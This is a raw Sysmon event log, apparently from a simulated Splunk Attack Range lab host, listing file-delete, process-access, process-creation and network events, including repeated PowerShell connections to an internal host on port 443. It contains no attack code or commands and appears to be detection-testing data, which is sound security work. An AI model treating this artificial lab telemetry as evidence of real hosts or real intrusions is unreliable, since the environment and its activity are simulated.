Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7436BE1593DCF5A47A2FE13B274D3AE,SHA256=FF6EEB33FCDBECE3C7400D6A5BD3BF772ADF1A7417BB35728418931E40D10902,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:24.910{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0ED04D0A30EA5C0229035C349576525E,SHA256=4A4656F0084E34A941A293B4D86692109DD07D979AB5EA6127B56C8936FB5298,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:24.808{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B13318813F3696E0D70A108E4974B41,SHA256=E156291A0DF82717FB3A679DB94F4C49AB77ADE8D1D10960FA363B021D5B02E2,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000035084374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:49.905{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56598-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:25.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8984C770D43BBD1BE43BB25AA5EC7D9,SHA256=FD5BE7523C152C55E2D06F61C2EDD115451317AD87AFA8DF60B8162B560FA0B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:26.872{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=943ABC8496D7BCEDCECB49F0206121EC,SHA256=33CB3AC63D4A78192AE18F981041A8BE5F41A88098591260F9AFD30442806CB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:27.905{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B250995F8E6F54E0AED0D0B57937C194,SHA256=CA2C5A42CE2630C9BEF29D8C9DBE5E09EEAEF5E9F5B3E9D15CC3C9BB9893D9C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.941{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B753A1DC53D89DBE1427B011EEC7FC7F,SHA256=6CDD342AB68A15ADCEB51A5BD47C202E0C594492ED5C0CA7D2ACF9961548999D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E14-613A-3890-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:10:28.909{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:10:28.909{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:10:28.909{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E14-613A-3890-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.909{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E14-613A-3890-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.904{B81B27B7-4E14-613A-3890-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035084384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.239{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E14-613A-3790-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.223{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E14-613A-3790-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:10:28.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:10:28.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.223{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E14-613A-3790-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:28.204{B81B27B7-4E14-613A-3790-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
23542300x800000000000000035084397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:29.955{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D05F34F665F930E5B7F84EDBE78B53D,SHA256=61967650E08207B57D063AE72780A6707013D820A6010D3DA0699EA8AAE48806,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:29.207{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D203BCD4BBD2E3BFC7275B330AFEC4D,SHA256=5DB2536D6639B320B8FD7D082A0ED86056C667D533D60E611A9E5EFE1DEBFEEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:29.206{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B970E1DD990F5B025B8BF1FB38BFA361,SHA256=E57751DB990B120B9E1CABDA7D2F0DFF4FEABAED4EE85EA23A8D019DEB7B8C73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:29.056{B81B27B7-4E14-613A-3890-03000000C801}55446720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:30.956{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5634CFFA4C8AEFD6A60365F99A8BDF07,SHA256=275F4843B10F895B9289AEFCCA42CA4A93D3FD2F502A3C5711939C6CBA41E723,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:30.907{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=32E7D30E188493D50F89C73CFD578638,SHA256=9B130349ED10A24DAAE9F2BDAAAD0F3453BDD3D75E9FD2516376C5116762F41B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:53.124{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56599-false10.0.1.12-8000- 
23542300x800000000000000035084401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:31.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF354B677725C8E29882533C4FB84967,SHA256=F557596472EAD8556681C12305DF8365B353C73CEAB0EEC892A388F107BE5BD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:55.921{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56600-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:33.004{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=964531AD37492AB7D477C51566564A84,SHA256=F0EDD4C92FFC6C5628044B9C91227F985EEDB37DD5B4B6CFF7AD44ADDC04F888,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:59.041{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56601-false10.0.1.12-8000- 23542300x800000000000000035084404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:34.038{B81B27B7-4024-611D-7300-00000000C801}2188NT 
23542300x800000000000000035084470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:55.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=888EBE706439AEACF723613100BD57F9,SHA256=38E767213C86628860A37D7CFC705E4AC407269265883028FE966E9EEFFD8EBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:19.992{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56609-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:55.072{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3AEA829B1AE3D7E9D631A4DE9BF8364A,SHA256=B0763F8AB062CEC53F9A30B78B1A4FDD7BE171A12D7804A8A119707AC826A17A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:56.510{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC1808C37F589D035628D91979A4555B,SHA256=8042E934B83750557557B4E886AEE6BCAA1496CB081677B4273AC99349560952,IMPHASH=00000000000000000000000000000000falsefalse - 
